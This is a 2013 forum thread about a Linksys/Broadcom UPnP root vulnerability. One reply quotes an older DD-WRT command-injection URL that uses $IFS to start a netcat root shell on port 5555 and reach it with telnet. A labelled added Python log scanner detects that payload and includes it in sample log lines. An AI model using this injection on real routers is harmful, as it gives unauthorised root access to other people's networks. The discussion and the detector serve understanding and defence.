ke4pym
Premium
join:2004-07-24
Charlotte, NC
reply to antdude

Re: Dangerous remote Linksys 0-day root exploit discovered

Hey, since Cisco is going to go back to fix this bug, maybe they can fix it so you can use modern browsers to access the administrator console!

Or would that be asking too much?


pandora
Premium
join:2001-06-01
Outland
reply to Smokey Bear

The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video -

We're still investigating some tricks to exploit this vulnerability from the internet, but for now, yes - it seems safe from the outside of the network. Of course, unless services are available from the internet.

Regards,

Leon Juranic

CEO

DefenseCode



It isn't clear if this exploit affects Tomato, Tomato USB, DD-WRT or any other open source variant of Linux based routers.
--
"If you put the federal government in charge of the Sahara Desert, in 5 years there'd be a shortage of sand." - Milton Friedman


NetFixer
Freedom is NOT Free
Premium
join:2004-06-24
The Boro
reply to AVD

said by AVD:

said by NetFixer:

If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).

I don't agree, think public access to a coffee shop or whatnot. A public user on the wlan should not be able to root the router. This is not the same as physical/software security.

And a properly set up public WiFi hotspot will not allow access by WiFi guests to the underlying infrastructure, or between WiFi clients. I have set up many such hotspots, and I used at least small business class routers and separate access points that can be set up to be secure. I have never set up a public WiFi hotspot using a residential grade WiFi router (although I have replaced those with proper equipment).

[sermon]Any business that operates a public WiFi hotspot without using the proper equipment that has been securely configured is just begging to be owned.[/sermon]
--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.


BoToMaTiC

join:2003-10-29
Louisville, KY


Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en-us/supp···/WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.



antdude
A Ninja Ant
Premium,VIP
join:2001-03-25
United State

said by BoToMaTiC:

Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en-us/supp···/WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.

XSS = Cross Site Scripting?
--
Ant @ AQFL.net and AntFarm.ma.cx. Please do not IM/e-mail me for technical support. Use this forum or better, »community.norton.com ! Disclaimer: The views expressed in this posting are mine, and do not necessarily reflect the views of my employer.


no__1__here
Premium
join:2003-10-13
Tomball, TX
reply to pandora

said by pandora:

The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video

I'm not sure I agree with that. The video shows them accessing busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.
--
COL 2:8

"Relativism just isn't true for me." - Hillary Putnam


NetFixer
Freedom is NOT Free
Premium
join:2004-06-24
The Boro
reply to EGeezer

said by EGeezer:

said by NetFixer:

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

In order for this to be exploited from a WAN side or wireless client, I'd think that remote administration and wireless HTTP and HTTPS would need to be enabled.

Yes, that (like the vulnerability this thread is about) is strictly a LAN side vulnerability, but an unnecessary one in my opinion. It just makes an XSS attack (which the vulnerability this thread is about seems to be) that much easier. Changing the default values for the LAN side of a residential/soho router has long been a sage security recommendation, and a deliberate bypassing of that measure by the manufacturer just does not seem like a wise move to me.

pandora
Premium
join:2001-06-01
Outland


reply to no__1__here

said by no__1__here:

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.

Cisco's patch is up for the WRT54GL, says it fixes issue with XSS (cross site scripting).


siljaline
I'm lovin' that double wide
Premium
join:2002-10-12
Montreal, QC


reply to antdude

Unless already mentioned:
Linksys vuln: Cisco responds - Working on fix for WRT54GL router
»www.theregister.co.uk/2013/01/17···ys_vuln/



NetFixer
Freedom is NOT Free
Premium
join:2004-06-24
The Boro
reply to antdude

Could this "new" exploit just be a variation of an old (2009) Linksys/DD-WRT router vulnerability?

Amazing new exploit for Linksys routers running DD-WRT

The vulnerability enables one-liner ownership of DD-WRT boxes. For example, typing the following into your browser while within a hot spot served by a DD-WRT router will provide root shell access on port 5555:

http://cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

It looks a bit cryptic until you remove the $IFS’es, which are just there to insert spaces in the command:

http://routerIP/cgi-bin/;nc -l -p \5555 -e /bin/sh

With the spaces removed, you can see this is just a call to the venerable netcat (i.e. “nc”) command, which sets up a tiny server on port 5555 running the shell (/bin/sh). Once the shell service is thus initiated, you can log in using telnet and execute commands – note that the shell prompt is not displayed:

$ telnet routerIP 5555


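As an added example, not code from the thread or from the article NetFixer quotes: a small access-log scanner that undoes percent-encoding and expands the $IFS trick before looking for shell separators in /cgi-bin/ requests, so the decoded request is what an analyst sees. The log lines are constructed, and the common-log-format layout they use is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not real traffic.
# Line 2 carries the $IFS request quoted in the thread, line 4 the same
# request with a layer of percent-encoding on top of it.
SAMPLE_LOG = """\
192.168.1.23 - - [17/Jan/2013:10:01:02 -0500] "GET /index.asp HTTP/1.1" 200 512
192.168.1.23 - - [17/Jan/2013:10:01:09 -0500] "GET /cgi-bin/;nc$IFS-l$IFS-p$IFS\\5555$IFS-e$IFS/bin/sh HTTP/1.1" 200 0
192.168.1.40 - - [17/Jan/2013:10:02:15 -0500] "GET /cgi-bin/status.cgi HTTP/1.1" 200 1024
192.168.1.40 - - [17/Jan/2013:10:02:20 -0500] "GET /cgi-bin/%3Bnc%24IFS-l%24IFS-p%24IFS5555%24IFS-e%24IFS/bin/sh HTTP/1.1" 200 0
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (?P<path>\S+) HTTP/')
IFS_RE = re.compile(r"\$\{?IFS\}?")           # $IFS or ${IFS} stands in for whitespace
SHELL_META_RE = re.compile(r"[;|&`\s]|\$\(")  # separators a CGI path never legitimately contains


def normalize_path(raw_path: str) -> str:
    """Undo percent-encoding (a few layers deep) and expand $IFS to a space."""
    decoded = raw_path
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return IFS_RE.sub(" ", decoded)


def is_cgi_injection(raw_path: str) -> bool:
    """True when a /cgi-bin/ request smuggles shell separators after normalization."""
    return raw_path.startswith("/cgi-bin/") and SHELL_META_RE.search(normalize_path(raw_path)) is not None


def scan_log(text: str) -> list:
    """Return one finding per suspicious request: client IP, raw path, decoded path."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        raw = m.group("path")
        if is_cgi_injection(raw):
            hits.append({"ip": m.group("ip"), "raw": raw, "normalized": normalize_path(raw)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['normalized']}")
```

The decoded form is what should be alerted on: the raw path hides the spaces, and a single percent-encoded layer hides the $IFS tokens as well.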


Smokey Bear
veritas odium parit
Premium
join:2008-03-15
Annie's Pub
reply to antdude

Update DefenseCode Security Blog | January 30, 2013

said by DefenseCode :
During the security evaluation of Cisco Linksys routers for a client, we have discovered a critical security vulnerability that allows a remote, unauthenticated attacker to remotely execute arbitrary code under root privileges.
Upon initial vulnerability announcement a few weeks ago Cisco spokesman stated that only one router model is vulnerable - WRT54GL.
We have continued with our research and found that, in fact, same vulnerable firmware component is also used in at least two other Cisco Linksys models - WRT54G3G and probably WRT310N. Could be others.

Moreover, the vulnerability turns out to be even more dangerous, since we have discovered that the same vulnerable firmware component is also used across many other big-brand router manufacturers and many smaller vendors.

Vulnerability itself is located in Broadcom UPnP stack, which is used by many router manufacturers that produce or produced routers based on Broadcom chipset. We have contacted them with vulnerability details and we expect patches soon.
However, we would like to point out that we have sent more than 200 e-mails to various router manufacturers and various people, without much success.

Some of the manufacturers contacted regarding this vulnerability are:

- Broadcom
- Asus
- Cisco
- TP-Link
- Zyxel
- D-Link
- Netgear
- US Robotics
- and so on.
Source: »blog.defensecode.com/2013/01/bro···ode.html

DefenseCode Security Advisory Broadcom UPnP Remote Preauth Code Execution Vulnerability (PDF): »www.defensecode.com/public/Defen···sory.pdf
--
»bit.ly/gUqYaH - C. Brian Smith: Think of the exclamation point as a car horn: a little goes a long way. Lay on it too hard and everyone’s going to think you’re a moron.
»bit.ly/V5mACB - How-To: Destroying a faulty keyboard


norwegian
Premium
join:2005-02-15
Outback

After reading this - is the upnp part relevant to this topic?
»Security Flaws in Universal Plug-n-Play: Unplug, Don't Play

I'm not sure where to post now, but I'm being specific to Broadcom chipsets and this topic isn't a discussion on them.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke


redwolfe_98
Premium
join:2001-06-11
reply to antdude

I said, one time, not too long ago, that I was leery of using routers because I suspected that they had backdoors that could be used for hacking.

If I needed a router, I would use one, but I don't need one since I only use a single computer (so I don't use one just to serve as a firewall).

I saw, one time, where someone said that their network had been hacked and that all of the data on their computers had been destroyed, and I suspected that their network had been compromised by a backdoor in their router.

It is surprising that no one has said anything about all of these routers having backdoors built into them before now. You would have thought that someone would have checked this stuff years ago.

Reading about the issue with the Barracuda routers, Barracuda's response was to say that they "fixed" the problem by reducing the number of backdoors that are built into their routers, leaving only two open. That is a relief. Only two backdoors to worry about.

Likewise, Cisco says they fixed the problem when they didn't.